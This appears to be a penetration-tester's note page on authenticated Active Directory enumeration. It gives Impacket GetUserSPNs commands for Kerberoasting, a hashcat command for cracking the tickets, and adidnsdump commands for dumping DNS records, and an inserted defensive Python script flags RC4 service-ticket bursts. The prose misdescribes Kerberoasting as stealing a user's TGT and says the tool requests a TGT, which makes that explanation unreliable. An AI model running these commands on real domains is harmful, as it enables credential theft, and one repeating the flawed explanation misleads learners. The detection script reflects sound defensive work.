
# auth-enumeration

Much of the same enumeration applies once you have authenticated, so go back and redo your enumeration using the credentials you now have. Once you have completed that, come back here and see what else you can do.

## Kerberoastable Users

Kerberoasting is an attack technique that involves stealing the Kerberos Ticket-Granting Ticket (TGT) of a user and using it to request service tickets for other systems on the network. Impacket is a collection of Python scripts that can be used to perform a Kerberoasting attack. Here's a general process for performing Kerberoasting using Impacket:

1. Install Impacket: You will need to have Impacket installed on your system in order to use the Kerberoast script. You can install Impacket by running the following command:

```shell
pip install impacket
```

2. Get a list of user accounts: To perform Kerberoasting, you will need a list of user accounts in the target AD domain. You can use the Impacket GetUserSPNs.py script to enumerate the user accounts in the domain.

```shell
GetUserSPNs.py -dc-ip <DC_IP> <domain>/<user>
```

3. Request a TGT for the user: Once you have a list of user accounts, you can use the Impacket GetUserSPNs.py script to request a TGT for the user.

```shell
GetUserSPNs.py -request -dc-ip <DC_IP> <domain>/<user>
```

4. Crack the hashes with hashcat

```shell
hashcat -m 13100 -a 0 <path to hashes> <path to wordlist>
```
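Seen from the defending side, the `-request` step above makes the domain controller log a Security event 4769 (a Kerberos service ticket was requested) for each SPN account, and hashcat mode 13100 corresponds to RC4 (encryption type 0x17) tickets. The following is an added example, not part of the original page: it flags accounts that request RC4 service tickets for several distinct services within a short window. The dict field names, the 5-minute window and the threshold of 3 are assumptions, and the events are constructed.

```python
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = 0x17  # etype 23, the ticket type hashcat mode 13100 cracks

# Constructed sample modelled on Security event 4769 fields (not real logs).
SAMPLE_EVENTS = [
    {"time": "2024-01-10T09:00:01", "user": "alice@CORP.LOCAL", "service": "svc_sql", "etype": "0x17"},
    {"time": "2024-01-10T09:00:02", "user": "alice@CORP.LOCAL", "service": "svc_web", "etype": "0x17"},
    {"time": "2024-01-10T09:00:03", "user": "alice@CORP.LOCAL", "service": "svc_backup", "etype": "0x17"},
    {"time": "2024-01-10T09:05:00", "user": "bob@CORP.LOCAL", "service": "svc_sql", "etype": "0x12"},
    {"time": "2024-01-10T09:06:00", "user": "carol@CORP.LOCAL", "service": "DC01$", "etype": "0x17"},
    {"time": "2024-01-10T08:00:00", "user": "dave@CORP.LOCAL", "service": "svc_sql", "etype": "0x17"},
    {"time": "2024-01-10T11:00:00", "user": "dave@CORP.LOCAL", "service": "svc_web", "etype": "0x17"},
    {"time": "2024-01-10T14:00:00", "user": "dave@CORP.LOCAL", "service": "svc_backup", "etype": "0x17"},
]

def find_roasting(events, window=timedelta(minutes=5), threshold=3):
    """Return {user: [services]} for users with >= threshold distinct RC4 requests inside window."""
    per_user = defaultdict(list)
    for ev in events:
        svc = ev["service"]
        # Machine accounts (trailing $) and krbtgt are routine traffic, not roastable targets.
        if svc.endswith("$") or svc.lower() == "krbtgt":
            continue
        if int(ev["etype"], 16) != RC4_HMAC:
            continue
        per_user[ev["user"]].append((datetime.fromisoformat(ev["time"]), svc))
    flagged = {}
    for user, reqs in per_user.items():
        reqs.sort()
        start = 0
        for end in range(len(reqs)):
            # Slide the window start forward until it spans at most `window`.
            while reqs[end][0] - reqs[start][0] > window:
                start += 1
            services = {s for _, s in reqs[start:end + 1]}
            if len(services) >= threshold:
                flagged.setdefault(user, set()).update(services)
    return {u: sorted(s) for u, s in flagged.items()}

if __name__ == "__main__":
    for user, services in find_roasting(SAMPLE_EVENTS).items():
        print(f"possible Kerberoasting by {user}: {', '.join(services)}")
```

Requests for AES tickets (0x11, 0x12) are not caught by this filter, so the distinct-service count is worth alerting on separately where RC4 is already disabled.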

## DNS Enumeration

```shell
adidnsdump -u '<FQDN>\<username>' -p '<password>' <NS server>
```

It might be useful to see tombstoned (deleted) records.

```shell
adidnsdump --include-tombstoned -u '<FQDN>\<username>' -p '<password>' <NS server>
```


